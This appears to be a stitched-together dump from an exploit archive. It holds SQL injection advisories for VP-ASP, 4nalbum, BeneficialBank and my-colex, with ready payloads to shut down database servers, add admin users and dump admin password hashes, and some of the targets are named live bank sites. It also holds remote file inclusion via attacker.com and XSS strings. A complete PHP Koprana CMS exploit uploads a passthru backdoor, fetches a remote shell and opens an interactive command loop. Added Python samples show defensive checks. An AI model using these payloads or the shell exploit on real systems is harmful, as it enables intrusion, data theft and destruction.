* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar(tracewar@gmail.com).
the SQL injection exists in the UpdateCustomer procedure:
Sub UpdateCustomer
    if getconfig("xMYSQL")="Yes" then
        MYSQLMaillistUpdateCustomer
        exit sub
    end if
    dim dbc, whereok
    dim doupdate, templastname
    OpenCustomerDb dbc
    Set objRS = Server.CreateObject("ADODB.Recordset")
    templastname=replace(strlastname,"'","''")          ' last name IS quote-doubled
    SQL = "SELECT * FROM " & dbtable & " WHERE "
    whereok=""
    sql=sql & whereok & " LastName='" & TempLastName & "'"
    whereok = " AND "
    SQL = SQL & whereok & " email='" & stremail & "'"   ' email is concatenated raw
    objRS.open SQL, dbc, adOpenKeyset, adLockOptimistic, adcmdText
    'debugwrite sql
    if not ObjRS.eof then
        DoUpdate="True"
    else
        objRs.close
        set objRS=nothing
    end if
    If Doupdate="" then
        Set objRS = Server.CreateObject("ADODB.Recordset")
        objRS.open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable
        objRS.AddNew
    end if
    Updateminimuminfo objrs
    CloseRecordset objRS
    ShopCloseDatabase dbc
end sub
If you keep tracing the code, you will notice the "stremail" input isn't checked properly for SQL injection:
Else
    ValidateData()
    if sError = "" Then
        If unsubscribe="" then
            UpdateCustomer
            SendMailToMerchant LangMailListRegistration
            WriteInfo
The ValidateData() procedure is totally useless:
Sub ValidateData
    strFirstname = Request.Form("strFirstname")
    strLastname = Request.Form("strLastname")
    strEmail = Request.Form("strEmail")
    unsubscribe=request("blnmaillist")
    ValidateMininumInfo
End Sub

Sub ValidateMininumInfo
    BlnMailList=TRUE
    If strLastname = "" Then
        sError = sError & LangCustLastname & LangCustRequired & "<br>"
    End If
    If strEmail = "" Then
        sError = sError & LangCustEmail & LangCustRequired & "<br>"
    Else
        CustomerValidateEmail stremail
    end If
end sub

Sub CustomerValidateEmail (stremail)
    If Not InStr(strEmail, "@") > 1 Then
        Serror=Serror & LangInvalidEmail & "<br>"
    end if
End sub
The query must contain "@" as a first character in order to pass the useless CustomerValidateEmail procedure.
Oh, and this is also the reason why SQL injection scanners didn't detect this injection earlier (HMPF HMPF *TIP* :P).
Quick hack:
write this as email: JUNK@';shutdown--
in order to shut down the SQL server.
write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')--
in order to add user 'a' with password 'a'.
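An added example, not part of the advisory: the shopmaillist.asp lookup re-created in Python, so the difference between the quote-doubled LastName and the raw email can be checked without VP-ASP, next to a parameterised lookup. Only the concatenation order and the InStr("@") > 1 check are taken from the ASP quoted above; the table name customers, the sqlite schema and the odd-quote-count heuristic are assumptions made here.

```python
# Added example (not from the advisory): the shopmaillist.asp lookup re-created
# in Python.  Concatenation order and the InStr("@") > 1 check mirror the ASP
# quoted above; the table name "customers", the sqlite schema and the
# odd-quote heuristic are assumptions made for this example.
import sqlite3

def vpasp_validate_email(email):
    """Mirror of CustomerValidateEmail: InStr(strEmail, "@") > 1.
    VBScript InStr is 1-based, so "@" may sit anywhere except position 1."""
    return email.find("@") + 1 > 1

def vpasp_build_lookup(lastname, email, dbtable="customers"):
    """Mirror of UpdateCustomer's SELECT: LastName gets quote-doubling, email does not."""
    templastname = lastname.replace("'", "''")
    sql = "SELECT * FROM " + dbtable + " WHERE "
    whereok = ""
    sql = sql + whereok + " LastName='" + templastname + "'"
    whereok = " AND "
    sql = sql + whereok + " email='" + email + "'"
    return sql

def passes_validation_and_injects(lastname, email):
    """(passes ValidateMininumInfo?, email breaks out of its literal?, composed SQL).
    An odd number of single quotes is a rough sign the literal was closed early."""
    ok = lastname != "" and email != "" and vpasp_validate_email(email)
    sql = vpasp_build_lookup(lastname, email)
    return ok, ok and sql.count("'") % 2 == 1, sql

def demo_db():
    """In-memory stand-in for the VP-ASP customer table (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (LastName TEXT, email TEXT)")
    conn.execute("INSERT INTO customers VALUES ('Smith', 'smith@example.com')")
    conn.commit()
    return conn

def safe_lookup(conn, lastname, email):
    """Parameterised equivalent: both values travel as data, never as SQL text."""
    cur = conn.execute("SELECT * FROM customers WHERE LastName=? AND email=?", (lastname, email))
    return cur.fetchall()

if __name__ == "__main__":
    for last, mail in (("Smith", "JUNK@';shutdown--"),
                       ("Smith", "asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')--"),
                       ("O'Brien", "ob@example.com"),
                       ("Smith", "@nope")):
        ok, injected, sql = passes_validation_and_injects(last, mail)
        print(f"valid={ok!s:5} injected={injected!s:5} {sql}")
    conn = demo_db()
    print(safe_lookup(conn, "Smith", "JUNK@';shutdown--"))   # [] and the table is untouched
```

The "@nope" case shows why the advisory's payloads all start with junk before the "@": InStr returning 1 fails the check, anything later passes it.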
THE END.
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
VP-ASP suffers from a SQL injection vulnerability. Details provided.
Janek Vind aka waraxe/waraxe-2004-SA006.txt ( na)
{================================================================================}
{ [waraxe-2004-SA#006] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in 4nalbum module for PhpNuke ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 15. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's infofile:
4nAlbum Version 0.92 (German & English) for phpNUKE Version 6.5 - 7.0 (http://phpnuke.org)
By WarpSpeed (Marco Wiesler) (warpspeed@4thDimension.de) @ Nov/2oo3 http://www.warp-speed.de
@ 4thDimension.de Networking
With this addon/module for phpNUKE you can offer a comfortable
(Media) Album to your users.
- Creating infinite categories and subcategories
- Comfortable Administrationsfunction with helptexts
- Upload from Mediafiles for Members/Guests possible (can be deactivated)
- etc
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure:
If we use the URLs below, then we can see standard PHP error messages with full path disclosure.
This is a frequently underestimated security flaw, which can give a potential attacker vital
information needed to hack further. For example, if we can exploit some SQL injection bugs and
the logged-in MySQL user has file permissions, then the exact full path to the file is needed for successful
file creation or reading.
Examples:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php
2. Remote file inclusion:
A remote attacker can make a GET or POST request with a specially crafted parameter and the victim server
will include the file from the remote server; therefore the attacker can make the victim server parse any PHP code
the attacker wants. Of course, if the webserver is located behind a properly configured firewall, or if the
php.ini configuration contains "allow_url_fopen = Off", then it doesn't work...
Examples:
First upload a file named "fileFunctions.php" to www.attacker.com. Then make the request:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com/
This is the original code from displaycategory.php:
...
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
function getThumbnail($img, $galloc) {
global
...
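An added example, not code from the Pie Web M{a,e}sher advisory above or from this 4nalbum one: a Python scan over web server access logs that flags requests where one of the include-controlling parameters named in those two advisories ("lib", "GLOBALS[pie][library_path]", "basepath", "adminpath") carries a remote URL or a PHP stream wrapper, which is what turns the include() calls shown above into remote file inclusion. The log lines are constructed for the example; the Common Log Format pattern, the wrapper list and the script paths are assumptions made here, not anything from the advisories.

```python
# Added example (not from either advisory): flag remote-file-inclusion attempts
# in access logs.  Parameter names come from the Pie Web M{a,e}sher ("lib",
# "GLOBALS[pie][library_path]") and 4nalbum ("basepath", "adminpath")
# advisories; the log lines and everything else are constructed for this example.
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the two advisories show being passed straight into include().
INCLUDE_PARAMS = {"lib", "GLOBALS[pie][library_path]", "basepath", "adminpath"}

# Values that make include() read from outside the local application tree:
# remote URLs (allow_url_fopen) and the usual PHP stream wrappers.
REMOTE_VALUE = re.compile(r"^(?:https?|ftps?)://|^(?:php|data|expect|phar)://", re.I)

# Common Log Format; only the source IP and the request target are used.
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def rfi_findings(line):
    """Return [(param, value), ...] for include-controlling parameters pointing off-host."""
    m = CLF.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if name in INCLUDE_PARAMS and REMOTE_VALUE.match(value)]

def scan(lines):
    """Return [(source ip, script path, findings), ...] for every offending line."""
    report = []
    for line in lines:
        hits = rfi_findings(line)
        if hits:
            m = CLF.match(line)
            report.append((m.group("ip"), urlsplit(m.group("target")).path, hits))
    return report

# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
10.0.0.7 - - [15/Mar/2004:10:01:12 +0200] "GET /nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com/ HTTP/1.0" 200 5120
10.0.0.7 - - [15/Mar/2004:10:01:15 +0200] "GET /pie/lib/action/alias.php?lib=http://www.attacker.com/x.txt? HTTP/1.0" 200 88
10.0.0.9 - - [15/Mar/2004:10:02:01 +0200] "GET /pie/lib/class/diff.php?GLOBALS[pie][library_path]=http%3A%2F%2Fevil.example%2Fs HTTP/1.0" 200 88
192.168.1.4 - - [15/Mar/2004:10:03:30 +0200] "GET /nuke71/modules.php?op=modload&name=4nAlbum&file=index HTTP/1.0" 200 9000
192.168.1.4 - - [15/Mar/2004:10:03:31 +0200] "GET /pie/lib/action/show.php?lib=../../local/lib HTTP/1.0" 200 300
""".splitlines()

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        for name, value in hits:
            print(f"{ip} -> {path}: {name}={value}")
```

The last sample line is deliberately left alone: a "../" value is a local inclusion attempt, which is a separate check from the remote case this block covers.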
3. Cross-Site scripting aka XSS
XSS is useful for stealing cookies, which will lead to bypassing authentication and
taking over the website (if the attacker can get the admin's cookies).
Example:
http://localhost/nuke71/modules/4nalbum/public/nmimage.php?z=[xss code here]
Because PhpNuke will filter some important symbols from GET requests, a POST request is needed.
4. sql injection
This is my favourite ;) - easy to exploit and the effect is devastating.
Try this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
and this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*
and you will see the admin's password MD5 hash and username. This is enough to handcraft the cookie and bypass authentication ;)
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ulljobu, djzone, raider and to all IT freaks in Estonia!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
The 4nalbum module for PHP-Nuke versions 6.5 to 7.0 suffers from path disclosure, cross site scripting, remote file inclusion, and SQL injection vulnerabilities.
The UnKn0wN/Koprana CMS Shell Upload ( na)
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
// - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit
!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $port,$packet)
{
if (!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}:{$port}\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Koprana CMS Remote Upload Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";
// Standalone usage takes host, port, path and mode, matching the BHR variables above.
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <port> <path> <mode>\n";
print "\nExample....: php $argv[0] localhost 80 / 1";
print "\nExample....: php $argv[0] localhost 80 /site/ 2\n";
die();
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4]; // 1 = minimal passthru() backdoor, 2 = full shell fetched below
$shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
if($mode == "2") $shell = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)
$boundary = "---------".str_replace(".", "", microtime());
$payload = "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= "".$shell."\n\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n";
$payload .= "--{$boundary}--\r\n";
$packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";
http_send($host,$port, $packet);
if($mode == "1") {
$packet = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (!($sock = http_send($host,$port, $packet))) die("\n[-] Upload failed!\n");
print "[+]Backdoor was uploaded!\n[+]Getting the shell...\n";
while(1)
{
print "\nBHR@{$host}# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
}else
print "Go to {$host}{$path}sh.php to check.\n";
?>
Koprana CMS remote shell upload exploit written in PHP.
Chokri Ben Achor/BeneficialBank Business 4.13.1 SQL Injection ( na)
Title:
======
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability
Date:
=====
2012-07-09
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=654
VL-ID:
=====
654
Common Vulnerability Scoring System:
====================================
8.5
Abstract:
=========
A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the Beneficial Bank Business Banking v4.13.1 CMS.
Report-Timeline:
================
2012-07-09: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
An auth bypass vulnerability was detected in the Beneficial Bank Business Banking 4.13.1 Content Management System.
Remote attackers without privileged user accounts can execute/inject their own SQL commands to compromise the application DBMS.
The vulnerability is located in the login module, bound to the vulnerable Company ID & Company Password parameters.
Successful exploitation of the vulnerability results in DBMS (server) or application (web) compromise & unauthorized
web application (admin/customer) panel access.
Vulnerable Section(s):
[+] Login
Vulnerable Parameter(s):
[+] User & Pass
Proof of Concept:
=================
The login auth bypass vulnerability can be exploited by a remote attacker without a privileged user account. For demonstration or to reproduce ...
PoC:
user : ' or 1=1--
pass : ' or 1=1--
URL:
http://www.thebeneficial-ebanking.com/customer_demo/index2.html
https://www.frontrangebankonline.com/customer_demo/index2.html
http://www.libertybaybank.com/customer_demo/index2.html
http://www.fs-bankonline.com/customer_demo/index2.html
http://www.centralstateonline.com/customer_demo/index2.html
http://www.hvbonlinebanking.com/customer_demo/index2.html
Risk:
=====
The security risk of the auth bypass vulnerability is estimated as critical.
Credits:
========
Vulnerability Research Laboratory - Chokri Ben Achor (meister@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
BeneficialBank Business version 4.13.1 suffers from a remote SQL injection vulnerability.
YEnH4ckEr/my-colex 1.4.2 (AB/XSS/SQL) Multiple Remote Vulnerabilities ( php)
***********************************************************************************************
***********************************************************************************************
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **
** **
** **
** LONG LIVE SPAIN!... WE WILL WIN THE WORLD CUP!... o.O **
** PROUD TO BE SPANISH! **
** **
***********************************************************************************************
***********************************************************************************************
----------------------------------------------------------------------------------------------
| MULTIPLE REMOTE VULNERABILITIES |
|--------------------------------------------------------------------------------------------|
| | my-colex 1.4.2 | |
| CMS INFORMATION: ------------------------------ |
| |
|-->WEB: http://www.collector.ch/drupal5/index.php |
|-->DOWNLOAD: http://www.collector.ch/drupal5/?q=node/11 |
|-->DEMO: http://www.collector.ch/drupal5/?q=node/10 |
|-->CATEGORY: Management |
|-->DESCRIPTION: myColex is a complete museum management and collection documentation |
| system with longterm archiving capabilities based on Apache/PHP and mySQL... |
|-->RELEASED: 2009-03-24 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 |
|-->DORK: N/A |
|-->CATEGORY: AUTH BYPASS/ SQL INJECTION / XSS |
|-->AFFECT VERSION: 1.4.2 (maybe <= ?) |
|-->Discovered Bug date: 2009-05-06 |
|-->Reported Bug date: 2009-05-06 |
|-->Fixed bug date: 2009-05-07 |
|-->Info patch: http://www.collector.ch/drupal5/?q=forum/15 |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support. |
|-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (Love you, sweetie!) |
----------------------------------------------------------------------------------------------
#################
/////////////////
INTRODUCTION:
/////////////////
#################
This app is completely vulnerable to SQL code injection.
Except for the auth bypass, we cannot exploit the SQL injection without a registered user.
#########################
////////////////////////
AUTH BYPASS (SQLi):
////////////////////////
#########################
<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>
----------
EXPLOIT:
----------
Name=' or 1=1#
password=123456 (over six characters)
Then, going to http://[HOST]/[HOME_PATH]/modules/admuser.php?Modus=Find
We get the admin credentials...
The password is encrypted with MySQL SHA-1.
#########################
////////////////////////
SQL INJECTION (SQLi):
////////////////////////
#########################
<<<<---------++++++++++++++ Condition: Be a registered user +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Condition: magic quotes = ON/OFF +++++++++++++++++--------->>>>
------------------
PROOF OF CONCEPT:
------------------
Some examples:
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database(),user(),version()%23
http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,version(),database(),version(),user(),database(),7/*
http://[HOST]/[HOME_PATH]/modules/person.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,2,3,4,version(),6,user(),version(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
http://[HOST]/[HOME_PATH]/modules/schlagwort.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version(),database(),current_user(),user(),6/*
There are more...
Return: user, version, ...
----------
EXPLOITS:
----------
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuEmail,SuPwd,SuSysAut+FROM+sysuser+WHERE+SuID=1%23
http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,2,3,4,SuUser,SuPwd,6+FROM+sysuser+WHERE+SuID=1/*
Return: username/password (id=1)
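An added example, not part of this advisory: a Python emulation of PHP's magic_quotes_gpc (addslashes applied to every request value) plus a minimal MySQL-style literal parser, to show why the auth bypass above needs magic quotes Off while the numeric ID injections work with it On or Off, and why the BeneficialBank ' or 1=1-- payload earlier on this page behaves the same way as the ' or 1=1# one here. The two query templates (sysuser.SuUser inside a quoted literal, kategorie.ID spliced in bare) are assumptions modelled on the injection points described; they are not my-colex code.

```python
# Added example (not from the advisory): emulate PHP's magic_quotes_gpc to show
# why the my-colex login bypass needs it Off while the ID-based UNION injection
# works either way.  The two query templates are assumptions modelled on the
# injection points described above; they are not my-colex code.

def addslashes(s):
    """PHP addslashes(): what magic_quotes_gpc applied to every GET/POST/cookie value."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)

def login_query(name, magic_quotes):
    """String context: the submitted name sits between single quotes (assumed template)."""
    if magic_quotes:
        name = addslashes(name)
    return "SELECT * FROM sysuser WHERE SuUser='" + name + "'"

def detail_query(obj_id, magic_quotes):
    """Numeric context: the submitted ID is spliced in bare (assumed template)."""
    if magic_quotes:
        obj_id = addslashes(obj_id)
    return "SELECT * FROM kategorie WHERE ID=" + obj_id

def read_literal(sql, i):
    """Parse a MySQL single-quoted literal starting at sql[i], honouring the
    backslash and doubled-quote escapes.  Returns (value, index past closing quote)."""
    i += 1
    out = []
    while i < len(sql):
        c = sql[i]
        if c == "\\" and i + 1 < len(sql):
            out.append(sql[i + 1])
            i += 2
        elif c == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                out.append("'")
                i += 2
            else:
                return "".join(out), i + 1
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated string literal")

def strip_trailing_comment(sql):
    """Drop everything from the first '#', '/*' or '--' onward (MySQL and MSSQL styles)."""
    cut = len(sql)
    for opener in ("#", "/*", "--"):
        pos = sql.find(opener)
        if pos != -1:
            cut = min(cut, pos)
    return sql[:cut]

def parse_where_value(sql):
    """Return (value the database compares against, SQL left over after it).
    For these single-condition templates, any leftover means the input escaped its context."""
    i = sql.index("=", sql.index("WHERE")) + 1
    if sql[i] == "'":
        value, i = read_literal(sql, i)
    else:
        j = i
        while j < len(sql) and (sql[j].isdigit() or sql[j] == "-"):
            j += 1
        value, i = sql[i:j], j
    return value, strip_trailing_comment(sql[i:]).strip()

def injection_succeeds(sql):
    return parse_where_value(sql)[1] != ""

BYPASS_NAME = "' or 1=1#"
UNION_ID = "1 and 0 union all select 1,version(),database(),user(),version()#"

if __name__ == "__main__":
    for mq in (False, True):
        print("magic_quotes =", "On" if mq else "Off")
        for sql in (login_query(BYPASS_NAME, mq), detail_query(UNION_ID, mq)):
            print(f"  injected={injection_succeeds(sql)!s:5} {sql}")
```

With magic quotes On the bypass becomes SuUser='\' or 1=1#', a harmless literal; the ID payload contains nothing addslashes touches, so magic quotes never protected a numeric context.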
###########################
///////////////////////////
CROSS SITE SCRIPTING (XSS):
///////////////////////////
###########################
XSS is possible where you like :P
Some examples:
http://[HOST]/[HOME_PATH]/modules/kalender.php?month=5&year=2009"><script>alert('y3nh4ck3r+was+here!')</script>
http://[HOST]/[HOME_PATH]/modules/ereignis.php?Modus=List&Page=1"><script>alert('y3nh4ck3r+was+here!')</script>&Order=ErAnfangsdatum
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Search&Kontext=objekt"><script>alert('y3nh4ck3r+was+here!')</script>
http://[HOST]/[HOME_PATH]/modules/image.php?image=<script>alert('y3nh4ck3r+was+here!')</script>
Of course there are more...
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
##*******************************************************************##
#######################################################################
#######################################################################
# milw0rm.com [2009-05-15]
Smiler/srcgrab.pl.txt ( na)
Subject: Re: Translate:f summary, history and thoughts > Simple perl script exploit for the problem.
Please find a simple perl script included at the bottom that exploits the problem described below.
> ----- Original Message -----
> From: "Daniel Dočekal" <ddoc@MIA.CZ>
> To: <BUGTRAQ@SECURITYFOCUS.COM>
> Sent: Tuesday, August 15, 2000 7:39 PM
> Subject: Translate:f summary, history and thoughts
>
>
> > Because Microsoft went the way of HIDING the actual mechanism of Translate:f
> > from all of us (original KB article is gone and new Security Bulletin is
> > playing nasty game of downplaying the problem), i have decided to write
> > follow up with sufficient information.
> >
> > HOW IT WORKS
> > -------------------------
> >
> > WebDAV implemented in Windows 2000 and Office 2000 (including FrontPage 2000
> > and FrontPage 2000 Server extensions) is the source of Translate:f problem.
> >
> > When someone makes request for ASP/ASA (or any other scriptable page) and
> > adds "Translate: f" into headers of HTTP GET request (headers are _not_ part
> > of URL, they are part of HTTP request), there is a serious security bug in
> > Windows 2000 (unpatched by SP1) that in return gives complete ASP/ASA code
> > instead of processed file (one has to add trailing slash "/" to end of
> > requested url to have this really working).
> >
> > "Translate: f" is legitimate header for WebDAV, it is used as it should be -
> > adding this to HTTP GET is sign for WebDAV component to really return SOURCE
> > code of file and bypass processing. It is used in FrontPage2000 and any
> > WebDAV compatible client to get file for editing. It has to be accompanied
> > by some other information which should not let anyone access sources.
> > Unfortunately, there is some mistake in coding, and simple adding of "only"
> > "Translate:f" and placing "/" at end of request to HTTP GET will lead in
> > security bug (which now plagues every second web tested in URLcheck test at
> > security.namodro.cz).
> >
> > It is WINDOWS 2000 bug, but because of FrontPage Server Extensions 2000
> > installed even on IIS 4.0 sites, it is also IIS 4.0 bug. Also worth of note
> > is that MANY IIS 4.0 sites will exhibit "Translate: f" bug when web files
> > are stored on SHARED (network) directory - this has been reported to
> > secure@microsoft.com the same time i started bombing them with information
> > that there is BIG problem with "Translate: f" - and result of case at
> > secure@microsoft.com :
> >
> > YES, IIS 4.0 is vulnerable, if files are located on shared drive - in that
> > case, please apply fix for "Virtualized UNC Share" vulnerability (please see
> > MS00-019 for fixes). So even IIS 4.0 is _not_ safe from this problem.
> >
> > THE HISTORY
> > ---------------------
> >
> > "Translate: f" bug was first made public around 5th of June 2000, at that
> > time MS KB article Q256888 was released and was fully describing the
> > mechanism. At 6th of June, there was a POSTFIX released as standalone EXE
> > fixing the problem.
> >
> > At that point someone at Microsoft made big mistake, instead of releasing
> > Security Bulletin and instead of notifying PREMIER SUPPORT customers, they
> > just left this only with one Q256888 article. And it appears that most
> > IIS4/IIS5 admins are just NOT checking Knowledge Base (we do, and Svet
> > Namodro has released its own priority warning and we have patched our
> > servers immediately).
> >
> > Then Service Pack 1 for Windows 2000 was released - the bug IS fixed by
> > applying SP1 - but it is obvious, that nobody is in big hurry to apply SP1.
> > Result is - many well known web sites are having security problem and showing
> > business logic including passwords to databases.
> >
> > After sending many, many, mails to Microsoft (including
> > secure@microsoft.com, Mr. Ballmer office, passing letter through support at
> > Czech Microsoft), there is result - it took TWO weeks to have new Security
> > Bulletin out. And i have to say, that i am very disappointed. Microsoft is
> > now HIDING the "Translate:f" nature from all of us (KB Q256888 was pulled
> > from Knowledge Base) and Security Bulletin is downplaying the level of
> > problem we are dealing with.
> >
> > LINKS
> > ---------
> >
> > http://www.microsoft.com/technet/security/bulletin/ms00-058.asp
> > Security bulletin talking about "Translate:f" but hiding this fact from us,
> > inside you will find POSTFIX URL which is
> > http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769
> >
> > http://support.microsoft.com/support/kb/articles/q256/8/88.ASP?LN=EN-US&SD=gn&FR=0
